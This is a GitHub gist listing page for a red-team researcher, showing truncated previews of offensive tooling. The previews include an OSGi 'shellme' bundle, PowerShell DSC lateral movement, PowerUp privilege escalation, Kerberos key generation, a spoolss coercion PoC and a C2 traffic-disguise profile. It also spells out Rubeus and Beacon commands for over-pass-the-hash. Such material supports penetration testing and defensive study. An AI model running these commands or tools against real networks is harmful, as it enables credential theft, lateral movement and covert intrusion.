Skip to content

Instantly share code, notes, and snippets.

View rvrsh3ll's full-sized avatar

Steve Borosh rvrsh3ll

1.6k followers · 13 following
View GitHub Profile
@rvrsh3ll
rvrsh3ll / CompileBundle.txt
Created June 20, 2018 15:36
javac -d ../classes/ -cp ../lib/felix.jar com/rvrsh3ll/osgi/shellme/Activator.java
jar -cmf MANIFEST.MF rvrsh3ll.jar -C ../classes com
@rvrsh3ll
rvrsh3ll / ExampleMANIFEST.MF
Last active January 27, 2020 06:48
Bundle-Name: rvrsh3ll osgi package
Bundle-Description: rvrsh3ll osgi package
Bundle-SymbolicName: com.rvrsh3ll.osgi.shellme.Activator
Bundle-Vendor: rvrsh3ll
Bundle-Version: 1.0.0
Import-Package: org.osgi.framework
Bundle-Activator: com.rvrsh3ll.osgi.shellme.Activator
@rvrsh3ll
rvrsh3ll / PowerShellDSCLateralMovement.ps1
Created June 28, 2018 19:33 — forked from mattifestation/PowerShellDSCLateralMovement.ps1
# This idea originated from this blog post on Invoke DSC Resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/
<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
@rvrsh3ll
rvrsh3ll / Powerup.ps1
Last active October 29, 2025 07:17
<#
PowerUp aims to be a clearinghouse of common Windows privilege escalation
vectors that rely on misconfigurations. See README.md for more information.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
#>
@rvrsh3ll
rvrsh3ll / Get-KerberosAESKey.ps1
Created September 2, 2018 19:49 — forked from Kevin-Robertson/Get-KerberosAESKey.ps1
Generate Kerberos AES keys from a known password
function Get-KerberosAESKey
{
<#
.SYNOPSIS
Generate Kerberos AES 128/256 keys from a known username/hostname, password, and kerberos realm. The
results have been verified against the test values in RFC3962, MS-KILE, and my own test lab.
https://tools.ietf.org/html/rfc3962
https://msdn.microsoft.com/library/cc233855.aspx
@rvrsh3ll
rvrsh3ll / gist:f0c8537d3672daf7e3803a6b49db2b78
Created November 7, 2018 15:14 — forked from HarmJ0y/gist:dc379107cfb4aa7ef5c3ecbac0133a02
Over-pass-the-hash with Rubeus and Beacon
# grab a TGT b64 blob with a valid NTLM
beacon> execute-assembly /home/specter/Rubeus_4.5.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
# inject the .kirbi
@rvrsh3ll
rvrsh3ll / Get-CIDRCount.ps1
Created January 15, 2019 08:17
Function Get-CidrHostCount {
[CmdletBinding()]
Param (
[Parameter(Mandatory)]
[ValidateRange(1,32)]
$Cidr
)
Begin {
} # End Begin.
@rvrsh3ll
rvrsh3ll / dementor.py
Created January 16, 2019 13:55 — forked from 3xocyte/dementor.py
rough PoC to connect to spoolss to elicit machine account authentication
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
@rvrsh3ll
rvrsh3ll / profile
Created February 12, 2019 11:06
/safebrowsing/rd/CltOb12nLW1IbHehcmUtd2hUdmFzEBAY7-0KIOkUDC7h2,/safebrowsing/rd/CINnu27nLO8hbHdfgmUtc2ihdmFyEAcY4|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
@rvrsh3ll
rvrsh3ll / content_discovery_all.txt
Created March 16, 2019 22:52 — forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
`
~/
~
ים
___
__
_